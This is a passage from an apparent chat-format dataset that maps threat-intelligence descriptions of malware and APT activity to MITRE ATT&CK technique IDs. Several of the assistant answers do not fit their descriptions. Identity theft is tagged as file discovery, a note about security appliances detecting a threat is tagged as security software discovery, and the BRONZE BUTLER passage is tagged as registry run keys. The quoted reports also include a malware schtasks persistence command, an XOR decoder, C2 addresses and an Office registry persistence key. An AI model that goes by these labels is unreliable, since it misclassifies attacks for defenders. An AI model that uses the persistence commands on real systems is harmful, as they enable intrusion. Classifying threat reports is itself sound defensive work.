- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the ‘at' or ‘schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. In particular, review network access for use of mobile USB modems on corporate systems"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The decoded string from the Sch resource is: SchTasks /Create /SC MINUTE /MO 3 /TN “%n%” /TR “wscript %path%” /f The decoded string from the VBS resource is: CreateObject(“WScript.Shell”).Run(“%app%”) The %n% string in the schtasks command above will be replaced with the GUID saved to GDI.bin"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files"
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal on Host: Clear Command History', 'T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a variation of the XOR cipher to encrypt files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We found malicious code injected into a JavaScript library provided by Volusion to their client shops. The injected code loaded another JavaScript stored on a Google Storage service. The loaded script is almost a direct copy of a normal JavaScript library but has a credit card skimmer carefully integrated. When customers submit their payment information, the skimmer will copy and send the personal information and credit card details to an exfiltration server belonging to the attackers"
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 uses cmd.exe to execute commands and custom backdoors."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete's Machete MSI installer has masqueraded as a legitimate Adobe Acrobat Reader installer."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a command to collect information about anti-virus software on the victim."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used implants to collect the system language ID of a compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ccf32 can delete files and folders from compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following function written in Python may be used to decode this file:def decode(data): \tout = \"\" \tc = 0 \tfor d in data: \t\tout += chr(ord(d)^c) \t\tc+=1 \treturn outOnce decoded it is discovered that this instance of OceanSalt attempts to communicate with 61.14.210[.]72 on port 7117"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wiarp creates a backdoor through which remote attackers can inject files into running processes."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of downloading additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLUELIGHT can collect a list of anti-virus products installed on a machine."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the system name, OS version including service pack, and system install date and sends the information to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used tools to automatically collect system and network configuration information."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use Obfs3, a pluggable transport, to add another layer of encryption and obfuscate TLS."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple can collect files, passwords, and other data from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RGDoor encrypts files with XOR before sending them back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While we do not have data supporting targeting information or telemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. The QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used acrobatverify[.]com for its C2. We used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. QUADAGENT Analysis The final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations as QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their C2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order. For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request. If that HTTPS request is not successful, the downloader will issue an HTTP request. Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications. The downloader will use the filename of the script (ex"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can execute \"getinfo\" to enumerate the computer name and OS version of a compromised system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chaes changed the template target of the settings.xml file embedded in the Word document and populated that field with the downloaded URL of the next payload."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has gained access through compromised accounts at cloud solution partners, and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems."
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 used Remexi to collect usernames from the system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to add a shortcut file in the Startup folder to achieve persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Daniel Bohannon’s Invoke-Obfuscation framework. The group also used files with base64 encoded PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cannon exfiltrates collected data over email via SMTP/S and POP3/S C2 channels."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can add a SID-History to a user if on a domain controller."
- },
- {
- "role": "assistant",
- "content": "T1134.005 - Access Token Manipulation: SID-History Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT collects the victim IP address, MAC address, as well as the victim account domain name."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader adds a Visual Basic script in the Startup folder to deploy the payload."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has developed malware for use in operations, including the creation of infected removable media."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used email for C2 via an Office macro."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InnaputRAT uses an 8-byte XOR key to obfuscate API names and other strings contained in the payload."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Identity theft via hijacking user-profiles and stealing their cryptocurrency, or using popular accounts to spread malware and/or scams"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon demonstrates some familiarity with the patterns of behavior, interests, and activities of its targets, suggesting that the operators may have been working with other sources of information about their targets’ behaviors. In addition, Stealth Falcon displayed above-average operational security throughout the campaign. Stealth Falcon also shows familiarity with creating and maintaining a range of fictitious personas, and registering and managing a significant amount of attack and C2 infrastructure with concern for operational security"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot has been executed via MSHTA application."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can delete all files created during its execution."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "kills and disables services for Windows Firewall, Windows Security Center, and Windows Defender."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, the script triggered a PowerShell stager"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOWDRIFT uses cloud based services for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To install a malicious shim database, the attacker invokes a Microsoft utility called sdbinst.exe through a PowerShell script"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use known credentials to run commands and spawn processes as a domain user account."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For comparison, if we were to inspect Fysbis “RemoteShell” associated strings in one of the stripped variants, we would only see the following: Figure 3: Sofacy Fysbis stripped binary string references to RemoteShell capability Compare this with what is available from the non-stripped variant: Figure 4: Sofacy Fysbis non-stripped binary strings referenes to RemoteShell capability Little static analysis gifts like these can help to speed defender enumeration of capabilities and – more importantly – further contribute to correlation and detection across related samples"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the Bazar loader downloads its payload, the Bazar backdoor, it is decrypted using the same method as the aforementioned Team9 variant"
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of performing remote file transmission."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has a feature to disable Windows Task Manager."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker has copied a random file from the Windows System32 folder to the \"%APPDATA%\" location under a different hidden filename."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UPPERCUT has the capability to gather the victim's proxy information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "xCaon has used the GetAdaptersInfo() API call to get the victim's MAC address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NICKEL used compromised credentials to sign into victims’ Microsoft 365 accounts through normal sign-ins with a browser and the legacy Exchange Web Services (EWS) protocol to review and collect victim emails. MSTIC has observed successful NICKEL sign-ins to compromised accounts through commercial VPN providers as well as from actor-controlled infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services', 'T1078.004 - Valid Accounts: Cloud Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The POSHSPY backdoor is designed to download and execute additional PowerShell code and Windows binaries"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used macros to deliver malware such as QUADAGENT and OopsIE. OilRig has used batch scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "build_downer has the ability to add itself to the Registry Run key for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reg may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators"
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used UPX to obscure malicious code."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie collects the hostname of the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses Rclone to exfiltrate data to cloud sharing websites (such as PCloud and MegaSync)."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Small Sieve can use SSL/TLS for its HTTPS Telegram Bot API-based C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cmd can be used to copy files to/from a remotely connected external system."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldenSpy has included a program \"ExeProtector\", which monitors for the existence of GoldenSpy on the infected system and redownloads if necessary."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT has created a service when it is installed on the victim machine."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant uses DLL search order hijacking."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used and to register a scheduled task to execute malware during lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The original malware scans the list of running process looking for outlook, iexplore or firefox. If found it injects the DLL into the process"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In a particular campaign, Mandiant identified that the threat actor performed initial reconnaissance via a VPS provider located in the same region as the victim. Mandiant believes a misconfiguration by the threat actor meant that the VPN services running on the VPS stopped functioning after 8 hours."
- },
- {
- "role": "assistant",
- "content": "T1583.003 - Virtual Private Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "COMSysApp service is first configured to autostart and the binpath of the service is set to svchost.exe. COMSysApp service is added under the “SvcHost” key as a preliminary step to its execution in the context of svchost.exe. The malicious DLL is added as a service DLL of COMSysApp. COMSysApp service is restarted"
- },
- {
- "role": "assistant",
- "content": "T1546.015 - Event Triggered Execution: Component Object Model Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key \"HKCU\\Software\\Microsoft\\Office test\\Special\\Perf\" to execute code."
- },
- {
- "role": "assistant",
